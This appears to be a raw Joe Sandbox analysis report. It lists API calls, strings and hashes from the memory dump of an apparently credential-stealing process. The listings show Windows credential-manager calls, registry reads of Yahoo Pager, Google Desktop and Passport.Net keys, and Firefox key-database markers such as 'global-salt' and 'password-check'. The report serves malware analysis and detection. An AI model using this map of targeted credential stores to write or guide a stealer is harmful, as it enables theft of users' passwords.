• Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
• Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
• Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
• Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
• GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
• OpenClipboard.USER32(?), ref: 0040C1B1
• GetLastError.KERNEL32 ref: 0040C1CA
• DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
• String ID:
• API String ID: 2014771361-0
• Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
• Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
• Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
• Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
Uniqueness
Uniqueness Score: -1.00%

APIs
• memcmp.MSVCRT ref: 00406151
  • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
  • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
  • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
• memcmp.MSVCRT ref: 0040617C
• memcmp.MSVCRT ref: 004061A4
• memcpy.MSVCRT ref: 004061C1
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID: global-salt$password-check
• API String ID: 231171946-3927197501
• Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
• Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
• Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
• Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
• Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
• Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
• Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetClientRect.USER32(?,?), ref: 004016A3
• GetSystemMetrics.USER32(00000015), ref: 004016B1
• GetSystemMetrics.USER32(00000014), ref: 004016BD
• BeginPaint.USER32(?,?), ref: 004016D7
• DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
• EndPaint.USER32(?,?), ref: 004016F3
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
• String ID:
• API String ID: 19018683-0
• Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
• Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
• Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
• Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040644F
• memcpy.MSVCRT ref: 00406462
• memcpy.MSVCRT ref: 00406475
  • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
  • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
  • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
  • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
  • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
• memcpy.MSVCRT ref: 004064B9
• memcpy.MSVCRT ref: 004064CC
• memcpy.MSVCRT ref: 004064F9
• memcpy.MSVCRT ref: 0040650E
  • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
• Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
• Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
• Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
• Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
Uniqueness
Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
• strlen.MSVCRT ref: 0040F7BE
• _mbscpy.MSVCRT ref: 0040F7CF
• LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
• String ID: Passport.Net\*
• API String ID: 2329438634-3671122194

APIs
  • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
• memset.MSVCRT ref: 0040330B
• GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
• strchr.MSVCRT ref: 0040335A
  • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
• strlen.MSVCRT ref: 0040339C
  • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
• String ID: Personalities
• API String ID: 2103853322-4287407858

APIs
• UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
• UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
• memcpy.MSVCRT ref: 004108C3
Strings
• 00000000-0000-0000-0000-000000000000, xrefs: 00410882
• 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: FromStringUuid$memcpy
• String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
• API String ID: 2859077140-3316789007

APIs
• memset.MSVCRT ref: 00444573
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: CloseOpenQueryValuememset
• String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
• API String ID: 1830152886-1703613266

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memset
• String ID: H
• API String ID: 2221118986-2852464175

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
• API String ID: 3510742995-3170954634

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memset
• String ID: winWrite1$winWrite2
• API String ID: 438689982-3457389245

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memcpymemset
• String ID: winRead
• API String ID: 1297977491-2759563040

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memcpymemset
• String ID: gj
• API String ID: 1297977491-4203073231

APIs
• GetParent.USER32(?), ref: 004090C2
• GetWindowRect.USER32(?,?), ref: 004090CF
• GetClientRect.USER32(00000000,?), ref: 004090DA
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
• SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
• API String ID: 4247780290-0

APIs
  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
• SetBkMode.GDI32(?,00000001), ref: 0041079E
• GetSysColor.USER32(00000005), ref: 004107A6
• SetBkColor.GDI32(?,00000000), ref: 004107B0
• SetTextColor.GDI32(?,00C00000), ref: 004107BE
• GetSysColorBrush.USER32(00000005), ref: 004107C6
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: Color$BrushClassModeNameText_strcmpimemset
• String ID:
• API String ID: 2775283111-0

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: winSeekFile$winTruncate1$winTruncate2
• API String ID: 885266447-2471937615

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: _strcmpi$_mbscpy
• String ID: smtp
• API String ID: 2625860049-60245459
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
• memset.MSVCRT ref: 00408258
  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
Strings
• Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: Close$EnumOpenmemset
• String ID: Software\Google\Google Desktop\Mailboxes
• API String ID: 2255314230-2212045309
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040C28C
• SetFocus.USER32(?,?), ref: 0040C314
  • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: FocusMessagePostmemset
• String ID: S_@$l
• API String ID: 3436799508-4018740455
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004092C0
• GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
• _mbscpy.MSVCRT ref: 004092FC
Strings
• <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: PrivateProfileString_mbscpymemset
• String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
• API String ID: 408644273-3424043681
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: _mbscpy
• String ID: C^@$X$ini
• API String ID: 714388716-917056472
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
  • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
• CreateFontIndirectA.GDI32(?), ref: 0040101F
• SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
• SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
• String ID: MS Sans Serif
• API String ID: 3492281209-168460110
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: ClassName_strcmpimemset
• String ID: edit
• API String ID: 275601554-2167791130
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: strlen$_mbscat
• String ID: 3CD
• API String ID: 3951308622-1938365332
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memset
• String ID: rows deleted
• API String ID: 2221118986-571615504
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• __allrem.LIBCMT ref: 00425850
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
• __allrem.LIBCMT ref: 00425933
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
• too many SQL variables, xrefs: 0042C6FD
• variable number must be between ?1 and ?%d, xrefs: 0042C5C2
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memset
• String ID: too many SQL variables$variable number must be between ?1 and ?%d
• API String ID: 2221118986-515162456

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
• memset.MSVCRT ref: 004026AD
  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
  • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
• LocalFree.KERNEL32(?), ref: 004027A6
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
• String ID:
• API String ID: 1593657333-0

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040C922
• SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
• GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
• PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: Message$MenuPostSendStringmemset
• String ID:
• API String ID: 3798638045-0

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
• strlen.MSVCRT ref: 0040B60B
• atoi.MSVCRT ref: 0040B619
• _mbsicmp.MSVCRT ref: 0040B66C
• _mbsicmp.MSVCRT ref: 0040B67F
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: _mbsicmp$??2@??3@atoistrlen
• String ID:
• API String ID: 4107816708-0

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
• String ID:
• API String ID: 1886415126-0

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: strlen
• String ID: >$>$>
• API String ID: 39653677-3911187716

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989

Uniqueness Score: -1.00%

APIs
• strlen.MSVCRT ref: 0040797A
• ??3@YAXPAX@Z.MSVCRT ref: 0040799A
  • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
  • Part of subcall function 00406F30: memcpy.MSVCRT ref: 00406F64
  • Part of subcall function 00406F30: ??3@YAXPAX@Z.MSVCRT ref: 00406F6D
• ??3@YAXPAX@Z.MSVCRT ref: 004079BD
• memcpy.MSVCRT ref: 004079DD
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: ??3@$memcpy$mallocstrlen
• String ID:
• API String ID: 1171893557-0

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: _strcmpi
• String ID: C@$mail.identity
• API String ID: 1439213657-721921413

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00406640
  • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
  • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
  • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
• memcmp.MSVCRT ref: 00406672
• memcpy.MSVCRT ref: 00406695
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memset$memcmp
• String ID: Ul@
• API String ID: 270934217-715280498

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
  • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
• sprintf.MSVCRT ref: 0040B929
• SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
  • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
• sprintf.MSVCRT ref: 0040B953
• _mbscat.MSVCRT ref: 0040B966
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
• String ID:
• API String ID: 203655857-0

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
Strings
• recovered %d pages from %s, xrefs: 004188B4
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
• String ID: recovered %d pages from %s
• API String ID: 985450955-1623757624
                                                                                              • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                              • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                              • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                              • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
